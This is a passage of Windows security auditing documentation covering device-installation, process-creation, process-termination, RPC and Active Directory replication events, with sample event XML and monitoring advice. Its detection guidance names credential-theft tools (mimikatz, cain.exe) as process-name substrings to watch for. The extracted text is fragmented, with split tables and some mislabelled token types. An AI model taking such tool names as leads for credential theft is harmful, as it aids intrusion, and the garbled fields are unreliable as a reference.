Device disable events, Compatible IDs “Compatible IDs”
Device disable events, Location information “Location Information”

6421(S): A request was made to enable a device.
Applies to
Windows 10
Windows Server 2016
Event Description:
when someone made a request to
enable a device.
This event doesn’t mean that device
was enabled.

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>13316</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SubjectDomainName">DESKTOP-NFC0HVN</Data>
<Data Name="SubjectLogonId">0x3fcc7</Data>
<Data Name="DeviceId">USB\\VID\_138A&PID\_0017\\FFBC12C950A0</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made the request. Event Viewer automatically tries to resolve
Account Name [Type = UnicodeString]: the name of the account that made the request.
the following:

For 6421(S ): A request was made to enable a device.
fields:
Device enable requests, Device Instance Path “Device ID”
Device enable requests, Device Description “Device Name”
Device enable requests, Class GUID “Class ID”
Device enable requests, Hardware IDs “Hardware IDs”
Device enable requests, Compatible IDs “Compatible IDs”
Device enable requests, Location information “Location Information”

6422(S): A device was enabled.
Applies to
Windows 10
Windows Server 2016
Event Description:
specific device was enabled.

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>13316</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="DeviceId">USB\\VID\_138A&PID\_0017\\ffbc12c950a0</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that enabled the device. Event Viewer automatically tries to resolve
Account Name [Type = UnicodeString]: the name of the account that enabled the device.
the following:

For 6422(S ): A device was enabled.
You can use this event to track the events and event information shown in the following table by using the
listed fields:
Device enable events, Device Instance Path “Device ID”
Device enable events, Device Description “Device Name”
Device enable events, Class GUID “Class ID”
Device enable events, Hardware IDs “Hardware IDs”

Device enable events, Compatible IDs “Compatible IDs”
Device enable events, Location information “Location Information”

6423(S): The installation of this device is forbidden by
system policy.
Applies to
Windows 10
Windows Server 2016
Event Description:
installation of this device is
forbidden by system policy.
Device installation restriction group
policies are located here:
\Computer
Configuration\Administrative
Templates\System\Device
Installation\Device Installation
Restrictions. If one of the policies
restricts installation of a specific
device, this event will be generated.

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>13316</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="DeviceId">USB\\VID\_04F3&PID\_012D\\7&1E3A8971&0&2</Data>
<Data Name="DeviceDescription">Touchscreen</Data>
<Data Name="ClassId">{00000000-0000-0000-0000-000000000000}</Data>
<Data Name="ClassName" />
<Data Name="HardwareIds">USB\\VID\_04F3&PID\_012D&REV\_0013 USB\\VID\_04F3&PID\_012D</Data>
<Data Name="CompatibleIds">USB\\Class\_03&SubClass\_00&Prot\_00 USB\\Class\_03&SubClass\_00
USB\\Class\_03</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that forbids the device installation. Event Viewer automatically tries
to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the
event.
Account Name [Type = UnicodeString]: the name of the account that forbids the device installation.
the following:

For 6423(S ): The installation of this device is forbidden by system policy.
If you want to track device installation policy violations then you need to track every event of this type.
You can use this event to track the policy violations and related information shown in the following table by
using the listed fields:
POLICY VIOLATION AND RELATED INFORMATION TO MONITOR FIELD TO USE
Device installation policy violations, Device Instance Path “Device ID”
Device installation policy violations, Device Description “Device Name”
Device installation policy violations, Class GUID “Class ID”
Device installation policy violations, Hardware IDs “Hardware IDs”

POLICY VIOLATION AND RELATED INFORMATION TO MONITOR FIELD TO USE
Device installation policy violations, Compatible IDs “Compatible IDs”
Device installation policy violations, Location information “Location Information”

6424(S): The installation of this device was allowed,
after having previously been forbidden by policy.
Applies to
Windows 10
Windows Server 2016
This event occurs rarely, and in some situations may be difficult to reproduce.
Event Versions: 0.

Applies to
Windows 10
Windows Server 2016
Audit Process Creation determines whether the operating system generates audit events when a process is
created (starts).
These audit events can help you track user activity and understand how a computer is being used. Information
includes the name of the program or the user that created the process.
Event volume: Low to Medium, depending on system usage.
This subcategory allows you to audit events generated when a process is created or starts. The name of the
application and user that created the process is also audited.
STRONGER STRONGER
STRONGER STRONGER
Domain Yes No Yes No It is typically

Controller useful to collect
Success auditing
information for
this subcategory
for forensic
investigations, to
find information
who, when and
with which
options\paramet
ers ran specific
process.
Additionally, you
can analyse
process creation
events for
elevated
credentials use,
potential
malicious process
names and so on.
The event
volume is
typically
medium-high
level, depending
on the process
activity on the
computer.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
STRONGER STRONGER
Member Server Yes No Yes No It is typically

useful to collect
Success auditing
information for
this subcategory
for forensic
investigations, to
find information
who, when and
with which
options\paramet
ers ran specific
process.
Additionally, you
can analyse
process creation
events for
elevated
credentials use,
potential
malicious process
names and so on.
The event
volume is
typically
medium-high
level, depending
on the process
activity on the
computer.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
STRONGER STRONGER
Workstation Yes No Yes No It is typically

useful to collect
Success auditing
information for
this subcategory
for forensic
investigations, to
find information
who, when and
with which
options\paramet
ers ran specific
process.
Additionally, you
can analyse
process creation
events for
elevated
credentials use,
potential
malicious process
names and so on.
The event
volume is
typically
medium-high
level, depending
on the process
activity on the
computer.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Events List:
4688(S ): A new process has been created.
4696(S ): A primary token was assigned to process.
4688(S): A new process has been created.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Process Creation
Event Description:
process starts.

event.
Event XML:
- <System>
<Level>0</Level>
<Task>13312</Task>
<Opcode>0</Opcode>
<Correlation />
<Computer>WIN-GG82ULGC9GO.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserName">WIN-GG82ULGC9GO$</Data>
<Data Name="NewProcessId">0x2bc</Data>
<Data Name="NewProcessName">C:\\Windows\\System32\\rundll32.exe</Data>
<Data Name="TokenElevationType">%%1938</Data>
<Data Name="ProcessId">0xe74</Data>
<Data Name="CommandLine" />
<Data Name="TargetUserSid">S-1-5-21-1377283216-344919071-3415362939-1104</Data>
<Data Name="TargetLogonId">0x4a5af0</Data>
<Data Name="ParentProcessName">C:\\Windows\\explorer.exe</Data>
<Data Name="MandatoryLabel">S-1-16-8192</Data>
</EventData>
</Event>

Event Versions:
0 - Windows Server 2008, Windows Vista.
1 - Windows Server 2012 R2, Windows 8.1.
Added “Process Command Line” field.
2 - Windows 10.
Subject renamed to Creator Subject.
Added “Target Subject” section.
Added “Mandatory Label” field.
Added “Creator Process Name” field.
Field Descriptions:
Creator Subject [Value for versions 0 and 1 – Subject]:
Security ID [Type = SID ]: SID of account that requested the “create process” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will
Note A security identifier (SID ) is a unique value of variable length used to identify a trustee
(security principal). Each account has a unique SID that is issued by an authority, such as an Active
Directory domain controller, and stored in a security database. Each time a user logs on, the system
retrieves the SID for that user from the database and places it in the access token for that user. The
system uses the SID in the access token to identify the user in all subsequent interactions with
Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever
be used again to identify another user or group. For more information about SIDs, see Security
identifiers.
Account Name [Type = UnicodeString]: the name of the account that requested the “create
process” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS
LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this
account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent
events that might contain the same Logon ID, for example, “4624: An account was successfully
logged on.”
Target Subject [Version 2]:
Note This event includes the principal of the process creator, but this is not always sufficient if the
target context is different from the creator context. In that situation, the subject specified in the process
termination event does not match the subject in the process creation event even though both events
refer to the same process ID. Therefore, in addition to including the creator of the process, we will also
include the target principal when the creator and target do not share the same logon.
Security ID [Type = SID ] [Version 2]: SID of target account. Event Viewer automatically tries to resolve
SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the
event.
Note A security identifier (SID ) is a unique value of variable length used to identify a trustee
(security principal). Each account has a unique SID that is issued by an authority, such as an Active
Directory domain controller, and stored in a security database. Each time a user logs on, the system
retrieves the SID for that user from the database and places it in the access token for that user. The
system uses the SID in the access token to identify the user in all subsequent interactions with
Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever
be used again to identify another user or group. For more information about SIDs, see Security
identifiers.
Account Name [Type = UnicodeString] [Version 2]: the name of the target account.
Account Domain [Type = UnicodeString] [Version 2]: target account’s domain or computer name.
Logon ID [Type = HexInt64] [Version 2]: hexadecimal value that can help you correlate this event
with recent events that might contain the same Logon ID, for example, “4624: An account was
successfully logged on.”
New Process ID [Type = Pointer]: hexadecimal Process ID of the new process. Process ID (PID ) is a
number used by the operating system to uniquely identify an active process. To see the PID for a
specific process you can, for example, use Task Manager (Details tab, PID column):
New Process Name [Type = UnicodeString]: full path and the name of the executable for the new
process.
Token Elevation Type [Type = UnicodeString]**: **
TokenElevationTypeDefault (1): Type 1 is a full token with no privileges removed or
groups disabled. A full token is only used if User Account Control is disabled or if the user is
the built-in Administrator account (for which UAC disabled by default), service account or
local system account.
TokenElevationTypeFull (2): Type 2 is an elevated token with no privileges removed or
groups disabled. An elevated token is used when User Account Control is enabled and the
user chooses to start the program using Run as administrator. An elevated token is also used
when an application is configured to always require administrative privilege or to always
require maximum privilege, and the user is a member of the Administrators group.
TokenElevationTypeLimited (3): Type 3 is a limited token with administrative privileges
removed and administrative groups disabled. The limited token is used when User Account
Control is enabled, the application does not require administrative privilege, and the user does
not choose to start the program using Run as administrator.
Mandatory Label [Version 2] [Type = SID ]: SID of integrity label which was assigned to the new
process. Can have one of the following values:
SID RID RID LABEL MEANING
S-1-16-0 0x00000000 SECURITY_MANDATORY_ Untrusted.

UNTRUSTED_RID
S-1-16-4096 0x00001000 SECURITY_MANDATORY_L Low integrity.

OW_RID
S-1-16-8192 0x00002000 SECURITY_MANDATORY_ Medium integrity.

MEDIUM_RID
S-1-16-8448 0x00002100 SECURITY_MANDATORY_ Medium high integrity.

MEDIUM_PLUS_RID
S-1-16-12288 0X00003000 SECURITY_MANDATORY_ High integrity.

HIGH_RID
S-1-16-16384 0x00004000 SECURITY_MANDATORY_S System integrity.

YSTEM_RID
S-1-16-20480 0x00005000 SECURITY_MANDATORY_P Protected process.

ROTECTED_PROCESS_RID
Creator Process ID [Type = Pointer]: hexadecimal Process ID of the process which ran the new process.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new
process has been created” Process Information\New Process ID.
Creator Process Name [Version 2] [Type = UnicodeString]: full path and the name of the
executable for the process.
Process Command Line [Version 1, 2] [Type = UnicodeString]: contains the name of executable
and arguments which were passed to it. You must enable “Administrative Templates\System\Audit
Process Creation\Include command line in process creation events” group policy to include
command line in process creation events:
By default Process Command Line field is empty.

For 4688(S ): A new process has been created.
High-value accounts: You might have high-value Monitor all events with the “Creator Subject\Security
domain or local accounts for which you need to monitor ID” or “Target Subject\Security ID” that corresponds to
each action. the high-value account or accounts.
administrators, built-in local administrator account,
domain administrators, service accounts, domain
controller accounts and so on.
Anomalies or malicious actions: You might have specific When you monitor for anomalies or malicious actions, use
requirements for detecting anomalies or monitoring the “Creator Subject\Security ID” or “Target
potential malicious actions. For example, you might need Subject\Security ID” (with other information) to monitor
to monitor for use of an account outside of working how or when a particular account is being used.
hours.
Non-active accounts: You might have non-active, Monitor all events with the “Creator Subject\Security
disabled, or guest accounts, or other accounts that should ID” or “Target Subject\Security ID” that corresponds to
never be used. the accounts that should never be used.
Account whitelist: You might have a specific whitelist of If this event corresponds to a “whitelist-only” action,
accounts that are the only ones allowed to perform review the “Creator Subject\Security ID” and “Target
actions corresponding to particular events. Subject\Security ID” for accounts that are outside the
whitelist.
Accounts of different types: You might want to ensure If this event corresponds to an action you want to
that certain actions are performed only by certain account monitor for certain account types, review the “Creator
types, for example, local or domain account, machine or Subject\Security ID” or “Target Subject\Security ID”
user account, vendor or employee account, and so on. to see whether the account type is as expected.
External accounts: You might be monitoring accounts Monitor the specific events for the “Creator
from another domain, or “external” accounts that are not Subject\Security ID” or “Target Subject\Security ID”
allowed to perform certain actions (represented by certain corresponding to accounts from another domain or
specific events). “external” accounts.
certain computers, machines, or devices on which certain actions performed by the “Creator Subject\Security ID”
people (accounts) should not typically perform any or “Target Subject\Security ID” that you are concerned
actions. about.
Account naming conventions: Your organization might Monitor “Creator Subject\Security ID” or “Target
have specific naming conventions for account names. Subject\Security ID” for names that don’t comply with
naming conventions.
If you have a pre-defined “New Process Name” or “Creator Process Name” for the process
reported in this event, monitor all events with “New Process Name” or “Creator Process Name”
not equal to your defined value.
You can monitor to see if “New Process Name” or “Creator Process Name” is not in a standard
folder (for example, not in System32 or Program Files) or is in a restricted folder (for example,
Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example
“mimikatz” or “cain.exe”), check for these substrings in “New Process Name” or “Creator
Process Name.”
It can be unusual for a process to run using a local account in either Creator Subject\Security ID
or in Target Subject\Security ID.
Monitor for Token Elevation Type with value TokenElevationTypeDefault (1) when
Subject\Security ID lists a real user account, for example when Account Name doesn’t contain
the $ symbol. Typically this means that UAC is disabled for this account for some reason.
Monitor for Token Elevation Type with value TokenElevationTypeDefault (2) on standard
workstations, when Subject\Security ID lists a real user account, for example when Account
Name doesn’t contain the $ symbol. This means that a user ran a program using administrative
privileges.
You can also monitor for Token Elevation Type with value TokenElevationTypeDefault (2) on
standard workstations, when a computer object was used to run the process, but that computer
object is not the same computer where the event occurs.
If you need to monitor all new processes with a specific Mandatory Label, for example S -1-16-20480
(Protected process), check the “Mandatory Label” in this event.
4696(S): A primary token was assigned to process.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Process Creation
Event Description:
This event generates every time a process runs
using the non-current access token, for example,
UAC elevated token, RUN AS different user
actions, scheduled task with defined user,
services, and so on.
IMPORTANT: this event is deprecated starting
from Windows 7 and Windows 2008 R2.

Event XML:
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}" />
<Level>0</Level>
<Task>13312</Task>
<Opcode>0</Opcode>
<Correlation />
<Computer>Win2008.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserName">WIN2008$</Data>
<Data Name="TargetUserSid">S-1-5-18</Data>
<Data Name="TargetLogonId">0x1c8c5</Data>
<Data Name="TargetProcessId">0xf40</Data>
<Data Name="TargetProcessName">C:\\Windows\\System32\\WerFault.exe</Data>
<Data Name="ProcessId">0x698</Data>
<Data Name="ProcessName">C:\\Windows\\System32\\svchost.exe</Data>
</EventData>
</Event>
Required Server Roles: this event is deprecated starting from Windows 7 and Windows 2008 R2.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “assign token to process” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “assign token to
process” operation.
the following:
Process ID [Type = Pointer]: hexadecimal Process ID of the process which started the new process with the
new security token. Process ID (PID ) is a number used by the operating system to uniquely identify an active
process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID
column):
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process which ran
the new process with new security token.
Target Process:
Target Process ID [Type = Pointer]: hexadecimal Process ID of the new process with new security token. If you
convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
Target Process Name [Type = UnicodeString]: full path and the name of the executable for the new process.
New Token Information:
Security ID [Type = SID ]: SID of account through which the security token will be assigned to the new process.
Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you
will see the source data in the event.
Account Name [Type = UnicodeString]: the name of the account through which the security token will be
assigned to the new process.
the following:

For 4696(S ): A primary token was assigned to process.
High-value accounts: You might have high-value domain or Monitor this event with the “Subject\Security ID” or “New
local accounts for which you need to monitor each action. Token Information\Security ID” that corresponds to the
Examples of high-value accounts are database administrators, high-value account or accounts.
requirements for detecting anomalies or monitoring potential “Subject\Security ID” or “New Token
malicious actions. For example, you might need to monitor for Information\Security ID” (with other information) to
use of an account outside of working hours. monitor how or when a particular account is being used.
Non-active accounts: You might have non-active, disabled, Monitor this event with the “Subject\Security ID” or “New
or guest accounts, or other accounts that should never be Token Information\Security ID” that corresponds to the
used. accounts that should never be used.
accounts that are the only ones allowed to perform actions the “Subject\Security ID” and “New Token
corresponding to particular events. Information\Security ID” for accounts that are outside the
whitelist.
certain actions are performed only by certain account types, certain account types, review the “Subject\Security ID” or
for example, local or domain account, machine or user “New Token Information\Security ID” to see whether the
account, vendor or employee account, and so on. account type is as expected.
External accounts: You might be monitoring accounts from Monitor this event for the “Subject\Security ID” or “New
another domain, or “external” accounts that are not allowed to Token Information\Security ID” corresponding to accounts
perform certain actions (represented by certain specific from another domain or “external” accounts.
events).
certain computers, machines, or devices on which certain actions performed by the “Subject\Security ID” or “New
people (accounts) should not typically perform any actions. Token Information\Security ID” that you are concerned
about.
Account naming conventions: Your organization might have Monitor “Subject\Security ID” or “New Token
specific naming conventions for account names. Information\Security ID” for names that don’t comply with
naming conventions.
If you have a pre-defined “Process Name” or “Target Process Name” for the process reported in this
event, monitor all events with “Process Name” or “Target Process Name” not equal to your defined value.
You can monitor to see if “Process Name” or “Target Process Name” is not in a standard folder (for
example, not in System32 or Program Files) or is in a restricted folder (for example, Temporary Internet
Files).
or “cain.exe”), check for these substrings in “Process Name” or “Target Process Name”.
It can be uncommon if process runs using local account.
Applies to
Windows 10
Windows Server 2016
Audit Process Termination determines whether the operating system generates audit events when process has
exited.
Success audits record successful attempts and Failure audits record unsuccessful attempts.
This policy setting can help you track user activity and understand how the computer is used.
Event volume: Low to Medium, depending on system usage.
STRONGER STRONGER
Domain No No IF No IF - This
typically is not as
important as
Audit Process
Creation
subcategory.
Using this
subcategory you
can, for example
get information
about for how
long process was
run in correlation
with 4688 event.
If you have a list
of critical
processes that
run on some
computers, you
can enable this
subcategory to
monitor for
termination of
these critical
processes.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
STRONGER STRONGER
Member Server No No IF No IF - This

subcategory
typically is not as
important as
Audit Process
Creation
subcategory.
Using this
subcategory you
can, for example
get information
about for how
long process was
run in correlation
with 4688 event.
If you have a list
of critical
processes that
run on some
computers, you
can enable this
subcategory to
monitor for
termination of
these critical
processes.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
STRONGER STRONGER
Workstation No No IF No IF - This
subcategory
typically is not as
important as
Audit Process
Creation
subcategory.
Using this
subcategory you
can, for example
get information
about for how
long process was
run in correlation
with 4688 event.
If you have a list
of critical
processes that
run on some
computers, you
can enable this
subcategory to
monitor for
termination of
these critical
processes.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Events List:
4689(S ): A process has exited.
4689(S): A process has exited.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Process Termination
Event Description:
This event generates every time a process has
exited.

Event XML:
- <System>
<Level>0</Level>
<Task>13313</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ProcessId">0xfb0</Data>
<Data Name="ProcessName">C:\\Windows\\System32\\notepad.exe</Data>
</EventData>
</Event>
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “terminate process” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “terminate process”
operation.
the following:
Process ID [Type = Pointer]: hexadecimal Process ID of the ended/terminated process. Process ID (PID ) is a
number used by the operating system to uniquely identify an active process. To see the PID for a specific
process you can, for example, use Task Manager (Details tab, PID column):
You can also correlate this process ID with a process ID in other events, for example, “4688(S ): A new
process has been created” New Process ID on this computer.
Process Name [Type = UnicodeString]: full path and the executable name of the exited/terminated process.
Exit Status [Type = HexInt32]: hexadecimal exit code of exited/terminated process. This exit code is unique
for every application, check application documentation for more details. The exit code value for a process
reflects the specific convention implemented by the application developer for that process.

For 4689(S ): A process has exited.
If you have a critical processes list for the computer, with the requirement that these processes must always
run and not stop, you can monitor Process Name field in 4689 events for these process names.
Audit RPC Events
Applies to
Windows 10
Windows Server 2016
Audit RPC Events determines whether the operating system generates audit events when inbound remote
procedure call (RPC ) connections are made.
STRONGER STRONGER
Domain No No No No Events in this

occur rarely.
Member Server No No No No Events in this

subcategory
occur rarely.
Workstation No No No No Events in this

subcategory
occur rarely.
Events List:
5712(S ): A Remote Procedure Call (RPC ) was attempted.
5712(S): A Remote Procedure Call (RPC) was
attempted.
Applies to
Windows 10
Windows Server 2016
It appears that this event never occurs.
Subcategory: Audit RPC Events
Event Schema:
A Remote Procedure Call (RPC ) was attempted.
Subject:
SID:%1
Name:%2
Account Domain:%3
LogonId:%4
PID:%5 Name:%6
Remote IP Address:%7
Remote Port:%8
RPC Attributes:
Interface UUID:%9
Protocol Sequence:%10
Authentication Service:%11
Authentication Level:%12

Event Versions: 0.
Applies to
Windows 10
Windows Server 2016
Audit Detailed Directory Service Replication determines whether the operating system generates audit events
that contain detailed tracking information about data that is replicated between domain controllers.
This audit subcategory can be useful to diagnose replication issues.
Event volume: These events can create a very high volume of event data on domain controllers.
STRONGER STRONGER
Domain No No IF IF IF - Events in this

typically have an
informational
purpose and it is
difficult to detect
any malicious
activity using
mainly used for
Active Directory
replication
troubleshooting.

makes sense only
on domain
controllers.

makes sense only
on domain
controllers.
Events List:
4928(S, F ): An Active Directory replica source naming context was established.
4929(S, F ): An Active Directory replica source naming context was removed.
4930(S, F ): An Active Directory replica source naming context was modified.
4931(S, F ): An Active Directory replica destination naming context was modified.
4934(S ): Attributes of an Active Directory object were replicated.
4935(F ): Replication failure begins.
4936(S ): Replication failure ends.
4937(S ): A lingering object was removed from a replica.
4928(S, F): An Active Directory replica source naming
context was established.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Detailed Directory Service
Replication
Event Description:
This event generates every time a new Active
Directory replica source naming context is
established.
Failure event generates if an error occurs
(Status Code != 0).

Event XML:
- <System>
<Level>0</Level>
<Task>14083</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="DestinationDRA">CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-
Name,CN=Sites,CN=Configuration,DC=contoso,DC=local</Data>
<Data Name="SourceDRA">CN=NTDS Settings,CN=WIN2012R2,CN=Servers,CN=Default-First-Site-
<Data Name="SourceAddr">ddec0cff-6ceb-4a59-b13f-1724c38a0970.\_msdcs.contoso.local</Data>
<Data Name="NamingContext">DC=ForestDnsZones,DC=contoso,DC=local</Data>
<Data Name="Options">368</Data>
<Data Name="StatusCode">0</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Destination DRA [Type = UnicodeString]: destination directory replication agent distinguished name.
Note The Directory Replication Agent (DRA ) handles replication between domain controllers. The
Directory Replication Agent uses the connection objects in the topology map to find out those partners that are
relevant when replicating changes to directory partitions. The DRA sends a replication request to the partners
of a domain controller when the domain controller needs to update its copy of Active Directory.
Source DRA [Type = UnicodeString]: source directory replication agent distinguished name.
attributes:
• CN - commonName
Source Address [Type = UnicodeString]: DNS record of the server from which information or an update
was received.
Naming Context [Type = UnicodeString]: naming context to replicate.
Note The Directory Tree of Active Directory tree is partitioned to allow sections to be distributed (replicated)
to domain controllers in different domains within the forest. Each domain controller stores a copy of a specific
part of the directory tree, called a Naming Context also known as Directory Partition. Naming Context is
replicated as a unit to other domain controllers in the forest that contain a replica of the same sub tree. A
Naming Context is also called a Directory Partition.
Options [Type = UInt32]: decimal value of DRS Options.
Status Code [Type = UInt32]: if there are no issues or errors, the status code will be 0. If an error happened,
you will receive Failure event and Status Code will not be equal to “0”. You can check error code meaning
here: https://msdn.microsoft.com/library/windows/desktop/ms681381(v=vs.85).aspx

For 4928(S, F ): An Active Directory replica source naming context was established.
Monitor for Source Address field, because the source of new replication (new DRA) must be authorized for
this action. If you find any unauthorized DRA you should trigger an event.
This event is typically used for Active Directory replication troubleshooting.
context was removed.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Detailed Directory
Service Replication
Event Description:
This event generates every time Active
Directory replica source naming context
was removed.
Failure event generates if an error
occurs (Status Code != 0).

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>14083</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SourceDRA">-</Data>
<Data Name="SourceAddr">2d361dd6-fc22-4d9d-b876-ec582b836458.\_msdcs.contoso.local</Data>
<Data Name="NamingContext">DC=contoso,DC=local</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
attributes:
• CN - commonName
Source Address [Type = UnicodeString]: DNS record of the server from which the “remove” request was
received.
Naming Context [Type = UnicodeString]: naming context which was removed.


For 4929(S, F ): An Active Directory replica source naming context was removed.
Monitor for Source Address field, because the source of the request must be authorized for this action. If
you find any unauthorized DRA you should trigger an event.
context was modified.
Applies to
Windows 10
Windows Server 2016
Replication
Event Description:
Directory replica source naming context was
modified.
Failure event generates if an error occurs
(Status Code != 0).
It is not possible to understand what exactly
was modified from this event.

Event XML:
- <System>
<Level>0</Level>
<Task>14083</Task>
<Opcode>0</Opcode>
<Correlation />
<Computer>Win2012r2.corp.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="DestinationDRA">CN=NTDS Settings,CN=WIN2012R2,CN=Servers,CN=Default-First-Site-
<Data Name="SourceDRA">-</Data>
<Data Name="SourceAddr">edf0bef9-1f73-4df3-8991-f6ec2d4ef3ae</Data>
<Data Name="NamingContext">CN=Schema,CN=Configuration,DC=contoso,DC=local</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Source DRA [Type = UnicodeString]: source directory replication agent distinguished name. Typically equals
“-“ for this event.
attributes:
• CN - commonName
Source Address [Type = UnicodeString]: DNS record of computer from which the modification request
was received.
Naming Context [Type = UnicodeString]: naming context which was modified.


For 4930(S, F ): An Active Directory replica source naming context was modified.
Monitor for Source Address field, because the source of the request must be authorized for this action. If
you find any unauthorized DRA you should trigger an event.
4931(S, F): An Active Directory replica destination
naming context was modified.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Detailed Directory
Service Replication
Event Description:
Directory replica destination naming
context was modified.
Failure event generates if an error
occurs (Status Code != 0).
It is not possible to understand what
exactly was modified from this event.

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>14083</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="DestinationDRA">ddec0cff-6ceb-4a59-b13f-1724c38a0970.\_msdcs.contoso.local</Data>
<Data Name="SourceDRA">CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-
<Data Name="SourceAddr">-</Data>
<Data Name="NamingContext">DC=ForestDnsZones,DC=contoso,DC=local</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
attributes:
• CN - commonName
Destination Address [Type = UnicodeString]: DNS record of computer to which the modification request
was sent.
Naming Context [Type = UnicodeString]: naming context which was modified.


For 4931(S, F ): An Active Directory replica destination naming context was modified.
4934(S): Attributes of an Active Directory object were
replicated.
Applies to
Windows 10
Windows Server 2016
This event generates when attributes of an Active Directory object were replicated.
Subcategory: Audit Detailed Directory Service Replication
Event Schema:
Attributes of an Active Directory object were replicated.
Session ID:%1
Object:%2
Attribute:%3
Type of change:%4
New Value:%5
USN:%6
Status Code:%7
Event Versions: 0.

4935(F): Replication failure begins.
Applies to
Windows 10
Windows Server 2016
Replication
Event Description:
This event generates when Active Directory
replication failure begins.

Event XML:
- <System>
<Level>0</Level>
<Task>14083</Task>
<Opcode>0</Opcode>
<Correlation />
<Computer>Win2012r2.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="ReplicationEvent">1</Data>
<Data Name="AuditStatusCode">8419</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Replication Event [Type = UInt32]: there is no detailed information about this field in this document.
Audit Status Code [Type = UInt32]: there is no detailed information about this field in this document.

For 4935(F ): Replication failure begins.
4936(S): Replication failure ends.
Applies to
Windows 10
Windows Server 2016
This event generates when Active Directory replication failure ends.
Event Schema:
Replication failure ends.
Replication Event:%1
Audit Status Code:%2
Replication Status Code:%3
Event Versions: 0.

4937(S): A lingering object was removed from a
replica.
Applies to
Windows 10
Windows Server 2016
This event generates when a lingering object was removed from a replica.
Event Schema:
A lingering object was removed from a replica.
Destination DRA:%1
Source DRA:%2
Object:%3
Options:%4
Status Code:%5
Event Versions: 0.

Applies to
Windows 10
Windows Server 2016
Audit Directory Service Access determines whether the operating system generates audit events when an Active
Directory Domain Services (AD DS ) object is accessed.
Event volume: High on servers running AD DS role services.
This subcategory allows you to audit when an Active Directory Domain Services (AD DS ) object is accessed. It
also generates Failure events if access was not granted.
STRONGER STRONGER
STRONGER STRONGER
Domain No Yes No Yes It is better to

Controller track changes to
Active Directory
objects through
the Audit
Directory Service
Changes
subcategory.
However, Audit
Directory Service
Changes doesn’t
give you
information
about failed
access attempts,
so we
recommend
Failure auditing
in this
subcategory to
track failed access
attempts to
Active Directory
objects.
For
recommendation
s for using and
analyzing the
collected
information, see
the Security
Monitoring
Recommendatio
ns sections. Also,
develop an Active
Directory
auditing policy
(SACL design for
specific classes,
operation types
which need to be
monitored for
specific
Organizational
Units, and so on)
so you can audit
only the access
attempts that are
made to specific
important
objects.

makes sense only
